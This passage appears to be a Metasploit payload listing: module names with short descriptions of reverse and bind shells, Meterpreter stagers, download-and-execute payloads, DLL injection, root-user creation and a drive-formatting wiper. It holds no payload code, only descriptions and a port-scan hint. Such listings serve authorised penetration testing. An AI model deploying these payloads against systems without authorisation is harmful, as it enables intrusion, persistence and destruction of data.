Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)\ncmd/windows/bind_lua Listen for a connection and spawn a command shell via Lua\ncmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)\ncmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)\ncmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby\ncmd/windows/download_eval_vbs Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line.\ncmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it\ncmd/windows/generic Executes the supplied command\ncmd/windows/powershell_bind_tcp Interacts with a powershell session on an established socket connection\ncmd/windows/powershell_reverse_tcp Interacts with a powershell session on an established socket connection\ncmd/windows/reverse_lua Creates an interactive shell via Lua\ncmd/windows/reverse_perl Creates an interactive shell via perl\ncmd/windows/reverse_powershell Connect back and create a command shell via Powershell\ncmd/windows/reverse_ruby Connect back and create a command shell via Ruby\nfirefox/exec This module runs a shell command on the target OS without touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript "launcher" to disk that hides the prompt.\nfirefox/shell_bind_tcp Creates an interactive shell via Javascript with access to Firefox's XPCOM API\nfirefox/shell_reverse_tcp Creates an interactive shell via Javascript with access to Firefox's XPCOM API\ngeneric/custom Use custom string or file as payload. 
Set either PAYLOADFILE or PAYLOADSTR.\ngeneric/debug_trap Generate a debug trap in the target process\ngeneric/shell_bind_tcp Listen for a connection and spawn a command shell\ngeneric/shell_reverse_tcp Connect back to attacker and spawn a command shell\ngeneric/tight_loop Generate a tight loop in the target process\njava/jsp_shell_bind_tcp Listen for a connection and spawn a command shell\njava/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell\njava/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection\njava/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP\njava/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS\njava/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager\njava/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection\njava/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager\njava/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/aarch64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/shell/reverse_tcp dup2 socket in x12, then execve. 
Connect back to the attacker\nlinux/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/armbe/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/armle/adduser Create a new user with UID 0\nlinux/armle/exec Execute an arbitrary command\nlinux/armle/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/armle/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/shell/bind_tcp dup2 socket in r12, then execve. Listen for a connection\nlinux/armle/shell/reverse_tcp dup2 socket in r12, then execve. Connect back to the attacker\nlinux/armle/shell_bind_tcp Connect to target and spawn a command shell\nlinux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/mips64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mips64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mips64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes.\nlinux/mipsbe/meterpreter/reverse_tcp Inject the mettle server payload (staged). 
Connect back to the attacker\nlinux/mipsbe/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes or executing other payloads that rely on initial startup procedures.\nlinux/mipsbe/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/mipsbe/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/mipsle/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes as well as on targets with extremely limited buffer space.\nlinux/mipsle/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/mipsle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes.\nlinux/mipsle/shell/reverse_tcp Spawn a command shell (staged). 
Connect back to the attacker\nlinux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/ppc/shell_find_port Spawn a shell on an established connection\nlinux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/ppc64/shell_find_port Spawn a shell on an established connection\nlinux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc64le/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc64le/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc64le/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/exec Execute an arbitrary command or just a /bin/sh shell\nlinux/x64/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). 
Connect back to the attacker\nlinux/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/pingback_bind_tcp Accept a connection from attacker and report UUID (Linux x64)\nlinux/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Linux x64)\nlinux/x64/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nlinux/x64/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x64/shell_bind_ipv6_tcp Listen for an IPv6 connection and spawn a command shell\nlinux/x64/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/x64/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\nlinux/x64/shell_find_port Spawn a shell on an established connection\nlinux/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6\nlinux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/x86/adduser Create a new user with UID 0\nlinux/x86/chmod Runs chmod on specified file with specified mode\nlinux/x86/exec Execute an arbitrary command or just a /bin/sh shell\nlinux/x86/meterpreter/bind_ipv6_tcp Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)\nlinux/x86/meterpreter/bind_ipv6_tcp_uuid Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)\nlinux/x86/meterpreter/bind_nonx_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/x86/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection (Linux x86)\nlinux/x86/meterpreter/bind_tcp_uuid Inject the mettle server payload (staged). 
Listen for a connection with UUID Support (Linux x86)\nlinux/x86/meterpreter/find_tag Inject the mettle server payload (staged). Use an established connection\nlinux/x86/meterpreter/reverse_ipv6_tcp Inject the mettle server payload (staged). Connect back to attacker over IPv6\nlinux/x86/meterpreter/reverse_nonx_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nlinux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nlinux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor\nlinux/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)\nlinux/x86/shell/bind_ipv6_tcp_uuid Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)\nlinux/x86/shell/bind_nonx_tcp Spawn a command shell (staged). Listen for a connection\nlinux/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection (Linux x86)\nlinux/x86/shell/bind_tcp_uuid Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)\nlinux/x86/shell/find_tag Spawn a command shell (staged). Use an established connection\nlinux/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to attacker over IPv6\nlinux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). 
Connect back to the attacker\nlinux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell\nlinux/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\nlinux/x86/shell_find_port Spawn a shell on an established connection\nlinux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nlinux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6\nlinux/zarch/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/zarch/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nmainframe/shell_reverse_tcp Listen for a connection and spawn a command shell. This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\nmulti/meterpreter/reverse_http Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP\nmulti/meterpreter/reverse_https Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS\nnetware/shell/reverse_tcp Connect to the NetWare console (staged). 
Connect back to the attacker\nnodejs/shell_bind_tcp Creates an interactive shell via nodejs\nnodejs/shell_reverse_tcp Creates an interactive shell via nodejs\nnodejs/shell_reverse_tcp_ssl Creates an interactive shell via nodejs, uses SSL\nosx/armle/execute/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/armle/execute/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/armle/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/armle/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.\nosx/ppc/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/ppc/shell/find_tag Spawn a command shell (staged). Use an established connection\nosx/ppc/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x64/dupandexecve/bind_tcp dup2 socket in edi, then execve. Listen, read length, read buffer, execute\nosx/x64/dupandexecve/reverse_tcp dup2 socket in edi, then execve. Connect, read length, read buffer, execute\nosx/x64/dupandexecve/reverse_tcp_uuid dup2 socket in edi, then execve. Connect back to the attacker with UUID Support (OSX x64)\nosx/x64/exec Execute an arbitrary command\nosx/x64/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen, read length, read buffer, execute\nosx/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). 
Connect, read length, read buffer, execute\nosx/x64/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker with UUID Support (OSX x64)\nosx/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/say Say an arbitrary string outloud using Mac OS X text2speech\nosx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port\nosx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nosx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x86/bundleinject/bind_tcp Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute\nosx/x86/bundleinject/reverse_tcp Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute\nosx/x86/exec Execute an arbitrary command\nosx/x86/isight/bind_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute\nosx/x86/isight/reverse_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute\nosx/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/x86/shell_find_port Spawn a shell on an established connection\nosx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x86/vforkshell/bind_tcp Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute\nosx/x86/vforkshell/reverse_tcp Call vfork() if necessary and spawn a command shell (staged). 
Connect, read length, read buffer, execute\nosx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell\nosx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell\nphp/bind_perl Listen for a connection and spawn a command shell via perl (persistent)\nphp/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6\nphp/bind_php Listen for a connection and spawn a command shell via php\nphp/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)\nphp/download_exec Download an EXE from an HTTP URL and execute it\nphp/exec Execute a single system command\nphp/meterpreter/bind_tcp Run a meterpreter server in PHP. Listen for a connection\nphp/meterpreter/bind_tcp_ipv6 Run a meterpreter server in PHP. Listen for a connection over IPv6\nphp/meterpreter/bind_tcp_ipv6_uuid Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support\nphp/meterpreter/bind_tcp_uuid Run a meterpreter server in PHP. Listen for a connection with UUID Support\nphp/meterpreter/reverse_tcp Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\nphp/meterpreter/reverse_tcp_uuid Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\nphp/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)\nphp/reverse_perl Creates an interactive shell via perl\nphp/reverse_php Reverse PHP connect back shell with checks for disabled functions\nphp/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably agood idea to use a bind or reverse shell unless firewalls prevent them from working. 
The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.\npython/meterpreter/bind_tcp Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection\npython/meterpreter/bind_tcp_uuid Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support\npython/meterpreter/reverse_http Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP\npython/meterpreter/reverse_https Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL\npython/meterpreter/reverse_tcp Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker\npython/meterpreter/reverse_tcp_ssl Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL\npython/meterpreter/reverse_tcp_uuid Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support\npython/meterpreter_bind_tcp Connect to the victim and spawn a Meterpreter shell\npython/meterpreter_reverse_http Connect back to the attacker and spawn a Meterpreter shell\npython/meterpreter_reverse_https Connect back to the attacker and spawn a Meterpreter shell\npython/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell\npython/pingback_bind_tcp Listens for a connection from the attacker, sends a UUID, then terminates\npython/pingback_reverse_tcp Connects back to the attacker, sends a UUID, then terminates\npython/shell_bind_tcp Creates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.\npython/shell_reverse_tcp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.\npython/shell_reverse_tcp_ssl Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.\npython/shell_reverse_udp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.\nr/shell_bind_tcp Continually listen for a connection and spawn a command shell via R\nr/shell_reverse_tcp Connect back and create a command shell via R\nruby/pingback_bind_tcp Listens for a connection from the attacker, sends a UUID, then terminates\nruby/pingback_reverse_tcp Connect back to the attacker, sends a UUID, then terminates\nruby/shell_bind_tcp Continually listen for a connection and spawn a command shell via Ruby\nruby/shell_bind_tcp_ipv6 Continually listen for a connection and spawn a command shell via Ruby\nruby/shell_reverse_tcp Connect back and create a command shell via Ruby\nruby/shell_reverse_tcp_ssl Connect back and create a command shell via Ruby, uses SSL\nsolaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell\nsolaris/sparc/shell_find_port Spawn a shell on an established connection\nsolaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nsolaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nsolaris/x86/shell_find_port Spawn a shell on an established connection\nsolaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\ntty/unix/interact Interacts with a TTY on an established socket connection\nwindows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. 
Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)\nwindows/dllinject/bind_hidden_ipknock_tcp Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method(you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)\nwindows/dllinject/bind_ipv6_tcp_uuid Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/dllinject/bind_named_pipe Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)\nwindows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)\nwindows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)\nwindows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection\nwindows/dllinject/bind_tcp_uuid Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)\nwindows/dllinject/find_tag Inject a DLL via a reflective loader. Use an established connection\nwindows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as ahop.\nwindows/dllinject/reverse_http Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)\nwindows/dllinject/reverse_http_proxy_pstore Inject a DLL via a reflective loader. 
Tunnel communication over HTTP\nwindows/dllinject/reverse_ipv6_tcp Inject a DLL via a reflective loader. Connect back to the attacker over IPv6\nwindows/dllinject/reverse_nonx_tcp Inject a DLL via a reflective loader. Connect back to the attacker (No NX)\nwindows/dllinject/reverse_ord_tcp Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/dllinject/reverse_tcp_dns Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_rc4 Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_rc4_dns Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_uuid Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support\nwindows/dllinject/reverse_winhttp Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)\nwindows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload\nwindows/download_exec Download an EXE from an HTTP(S)/FTP URL and execute it\nwindows/exec Execute an arbitrary command\nwindows/format_all_drives This payload formats all mounted disks in Windows (aka ShellcodeOfDeath). After formatting, this payload sets the volume label to the string specified in the VOLUMELABEL option. If the code is unable to access a drive for any reason, it skips the drive and proceeds to the next volume.\nwindows/loadlibrary Load an arbitrary library path\nwindows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon\nwindows/meterpreter/bind_hidden_ipknock_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. Thesocket will appear as "closed," thus helping to hide the shellcode\nwindows/meterpreter/bind_hidden_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/meterpreter/bind_ipv6_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x86)\nwindows/meterpreter/bind_ipv6_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/meterpreter/bind_named_pipe Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x86)\nwindows/meterpreter/bind_nonx_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (No NX)\nwindows/meterpreter/bind_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x86)\nwindows/meterpreter/bind_tcp_rc4 Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection\nwindows/meterpreter/bind_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. 
Listen for a connection with UUID Support (Windows x86)\nwindows/meterpreter/find_tag Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Use an established connection\nwindows/meterpreter/reverse_hop_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.\nwindows/meterpreter/reverse_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows wininet)\nwindows/meterpreter/reverse_http_proxy_pstore Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP\nwindows/meterpreter/reverse_https Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows wininet)\nwindows/meterpreter/reverse_https_proxy Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP using SSL with custom proxy support\nwindows/meterpreter/reverse_ipv6_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker over IPv6\nwindows/meterpreter/reverse_named_pipe Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot\nwindows/meterpreter/reverse_nonx_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. 
Connect back to the attacker (No NX)\nwindows/meterpreter/reverse_ord_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_allports Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/meterpreter/reverse_tcp_dns Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_rc4 Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_rc4_dns Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support\nwindows/meterpreter/reverse_winhttp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows winhttp)\nwindows/meterpreter/reverse_winhttps Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows winhttp)\nwindows/meterpreter_bind_named_pipe Connect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.\nwindows/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nwindows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nwindows/patchupdllinject/bind_hidden_ipknock_tcp Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/patchupdllinject/bind_hidden_tcp Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/patchupdllinject/bind_ipv6_tcp Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)\nwindows/patchupdllinject/bind_ipv6_tcp_uuid Inject a custom DLL into the exploited process. Listen for an 